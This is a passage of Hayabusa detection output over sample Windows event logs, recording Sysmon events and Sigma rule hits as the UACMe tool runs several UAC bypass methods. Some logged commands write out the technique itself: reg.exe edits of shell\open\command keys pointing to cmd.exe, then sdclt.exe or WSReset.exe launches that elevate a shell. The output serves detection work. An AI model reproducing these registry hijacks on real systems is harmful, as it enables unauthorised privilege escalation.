C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p 
-s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: 
C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:30.389 
+09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys 
Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" 
-ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.409 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.972 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 
c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d 
""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash 